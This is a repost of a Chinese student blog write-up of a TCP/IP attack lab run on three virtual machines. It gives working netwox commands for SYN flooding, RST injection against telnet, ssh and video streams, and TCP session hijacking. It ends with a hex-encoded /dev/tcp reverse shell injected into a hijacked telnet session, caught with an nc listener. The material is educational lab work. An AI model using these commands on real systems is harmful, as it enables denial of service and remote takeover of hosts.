ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

TCP/IP Attack Lab

2021-05-12 18:32:08  阅读:380  来源: 互联网

标签:netwox -- IP 192.168 TCP Attack Lab tcp 43.6


文章目录

Lab Environment

Network Setup.

To conduct this lab, we need to have at least 3 machines. One computer is used for attacking, the second computer is used as the victim, and the third computer is used as the observer.

For convenience, I set up 3 virtual machines on the same host computer. Here are their net configuration.

1.For observer.
在这里插入图片描述
2.For Attacker.
在这里插入图片描述

3.For server.
在这里插入图片描述

Task 1: SYN Flooding Attack

通过此命令查看系统设置的队列范围大小

sudo sysctl -q net.ipv4.tcp_max_syn_backlog

在这里插入图片描述

可以看到最长为512

再通过netstat -atu 查看正常状态下服务器中的半打开连接。

在这里插入图片描述

在进行洪泛攻击之前,先用客户机登录服务机。

telnet 192.168.2.6

在这里插入图片描述
可以看到可以成功登录。

在SYN cookie打开的情况下,用 Netwox 进行洪泛攻击。

sudo netwox 76 --dst-ip 192.168.2.6 --dst-port 23

在这里插入图片描述

查看此时服务机中的半打开连接。

在这里插入图片描述
可以看到此时,服务机的连接队列中有大量的半连接状态。

我们尝试用客户机登录服务机,发现仍然可以登录成功。

在这里插入图片描述

然后我们用这个命令sudo sysctl -w net.ipv4.tcp_syncookies=0 关闭 SYN cookie

在这里插入图片描述

重复上面的操作。

在这里插入图片描述

可以看到登录失败。

Task 2: TCP RST Attacks on telnet and ssh Connections

Telnet连接

用客户机192.168.43.5 登录服务机192.168.43.6

在这里插入图片描述

可以看到连接的端口号为49469

用主机192.168.43.7 进行攻击。

sudo netwox 78 --device "Eth0" --filter "host 192.168.43.6 and tcp port 49169" --ips "192.168.43.5"

在这里插入图片描述

观察客户机,发现连接断开。

在这里插入图片描述

SSH连接

用客户机192.168.43.5登录服务机192.168.43.6

ssh seed@192.168.43.6

在这里插入图片描述

Wireshark 抓包,查看连接端口。

在这里插入图片描述

可以看到端口为22

用主机192.168.43.7进行攻击

sudo netwox 78 --device "Eth0" --filter "host 192.168.43.6 and tcp port 22" --ips "192.168.43.5"

在这里插入图片描述

观察客户机,连接中断。

在这里插入图片描述

Task 3: TCP RST Attacks on Video Streaming Applications

用服务机192.168.43.6观看bilibili视频

用主机192.168.43.7进行攻击

sudo netwox 78 --device "Eth0" --filter "host 192.168.43.6"

在这里插入图片描述

可以看到服务机192.168.43.6视频传输中断。

Task 4: TCP Session Hijacking

用主机192.168.43.7打开wireshark 监听客户端192.168.43.5到服务端192.168.43.6的TCP数据包。

在这里插入图片描述

用客户端192.168.43.5登录服务端192.168.43.6

telnet 192.168.43.5

在这里插入图片描述

找到建立连接发送的最后一个数据包,观察源ip地址,目的ip地址,源端口和目的端口。

在这里插入图片描述

使用netwox 40 来劫持此TCP会话。

  1. 用python打印出hello,world的ASCII码。

     print 'hello,world'.encode("hex")
    

    在这里插入图片描述
    可以看到它的ASCII码为68656c6c6f2c776f726c64

  2. 构造netwox命令

    sudo netwox 40 --ip4-src 192.168.43.5 --ip4-dst 192.168.43.6 --tcp-src 54992 --tcp-dst 23 --tcp-seqnum 120 --tcp-window 213 --tcp-data “68656c6c6f2c776f726c64”

    在这里插入图片描述

Task 5: Creating Reverse Shell using TCP Session Hijacking

用python将反向shell的命令转换为ASCII码

/bin/bash -i > /dev/tcp/192.168.43.7/9090 2>&1 0<&1
print '/bin/bash -i > /dev/tcp/192.168.43.7/9090 2>&1 0<&1'.encode("hex")

在这里插入图片描述

2f62696e2f62617368202d69203e202f6465762f7463702f3139322e3136382e34332e372f3930393020323e263120303c2631

在主机192.168.43.7(攻击机)用nc命令建立一个TCP服务器监听9090端口。

nc -lv 9090

在这里插入图片描述

获取源地址,目的地址,源端口,目的端口,序列号。

在这里插入图片描述

构造netwox命令

sudo netwox 40 --ip4-src 192.168.43.5 --ip4-dst 192.168.43.6 --tcp-src 54992 --tcp-dst 23 --tcp-seqnum 2952122777 --tcp-window 113 --tcp-data “0d002f62696e2f62617368202d69203e202f6465762f7463702f3139322e3136382e34332e372f3930393020323e263120303c26310d00”

0d00表示回车

在这里插入图片描述

最后返回反向shell

在这里插入图片描述

标签:netwox,--,IP,192.168,TCP,Attack,Lab,tcp,43.6
来源: https://blog.csdn.net/weixin_48512332/article/details/116716349

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有